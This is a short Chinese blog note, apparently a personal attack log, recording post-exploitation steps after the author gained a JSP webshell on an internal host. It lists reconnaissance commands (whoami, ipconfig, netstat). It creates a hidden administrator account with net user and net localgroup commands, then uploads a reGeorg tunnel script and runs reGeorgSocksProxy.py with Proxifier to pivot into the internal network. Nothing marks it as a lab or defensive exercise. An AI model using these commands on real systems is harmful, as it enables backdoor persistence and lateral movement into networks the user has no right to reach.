- 拿到一个webshell,jsp大马,一看是个内网ip,弄个reGeorg+Proxifiter代理进内网,顺便做个笔记。
- 先看下什么权限
whoami
0.jpg
ipconfig
1.jpg
- 确实是内网ip
- 看下开放的端口
netstat -ano
2.jpg
- 系统权限直接添加用户
net user admin password /add
net localgroup administrators admin /add
net user admin
3.jpg
-
万事准备好了只差代理了,接下来上传脚本
4.jpg -
看到下边这个界面就是成功了
5.jpg - 运行reGeorg监听9999端口,可以看到正常运行
reGeorgSocksProxy.py -p 9999 -u http://11.11.11.11/tunnel.tomcat.5.jsp
6.jpg
-
下面我们配置Proxifier,运行Proxifier之后设置代理
7.jpg -
设置代理服务器为9999
8.jpg -
代理规则设置
9.jpg -
这些都设置好了就大功告成了,剩下就是连接主机了
10.jpg
网友评论